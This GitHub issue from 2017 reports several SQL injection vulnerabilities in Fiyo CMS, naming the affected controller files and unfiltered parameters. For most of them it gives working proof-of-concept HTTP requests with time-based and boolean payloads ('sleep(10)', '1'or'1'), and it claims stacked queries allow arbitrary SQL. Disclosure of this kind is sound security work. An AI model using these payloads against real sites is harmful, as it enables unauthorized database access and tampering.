Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Many sql injection in fiyo cms #5

Open
iflody opened this issue Jul 17, 2017 · 1 comment

Comments

@iflody
Copy link

commented Jul 17, 2017

  1. In /apps/app_article/controller/editor.php

$_POST['id'] has no filters and $_POST['art_title'] just filter the double quote. So we can inject into this SQL statement. Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

POST /fiyo/apps/app_article/controller/editor.php HTTP/1.1
Referer: http://localhost

id=" and sleep(10)&art_title=123\

  1. In /apps/app_comment/controller/insert.php

$_POST paraments has some meanless filter. So we can inject into this SQL statement. Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

POST /fiyo/apps/app_comment/controller/insert.php
Referer: http://localhost

send=true&name=1" or sleep(10) or "1&email=aaa@qq.com&url=11&text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%3Ditem%26id%3D184

  1. In dapur/apps/app_article/controller/article_list.php

$_GET[cat], $_GET[user], $_GET[level], $GET['iSortCol'.$i] are all no filters at all. So we can inject into this SQL statement. Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

GET /fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960
Referer: http://localhost

  1. In dapur/apps/app_article/controller/article_status.php

$_GET['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

GET /fiyo/dapur/apps/app_article/controller/article_status.php?fp=1&id=1'or'1
Referer: http://localhost

  1. In dapur/apps/app_article/controller/comment_status.php

$_GET['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

GET /fiyo/dapur/apps/app_article/controller/comment_status.php?stat=1&id=1'or'1
Referer: http://localhost

  1. In dapur/apps/app_article/sys_article.php

"$_POST[parent_id]","$_POST[desc]","$_POST[keys]","$_POST[level]" has no filters and they will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

In add category and edit category they are the similar problems.

In add article and edit article there are so many paraments have been not filtered.

The attack vector is so simple and too many attact vector could be use. So I will not write the detail.

  1. In dapur/apps/app_comment/controller/comment_status.php

$_GET['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

GET /fiyo/dapur/apps/app_comment/controller/comment_status.php?stat=1&id=1'or'1
Referer: http://localhost

  1. In dapur/apps/app_comment/sys_comment.php

In edit comment component:

$_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status], $_POST[id] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

In enable comment and disable comment component:

$_REQUEST['id'] has no filters and it will be inject into SQL statement.Because it used the PDO to connect the MySQL Server, we can use stack query to execute any SQL statement.

The attack vector is so simple and too many attact vector could be use. So I will not write the detail.

Discoverer: Valo & Melody from Chaitin Tech

@iflody iflody changed the title Many sq linjection in fiyo cms Many sql injection in fiyo cms Jul 17, 2017

@firstryan

This comment has been minimized.

Copy link
Contributor

commented Jul 18, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.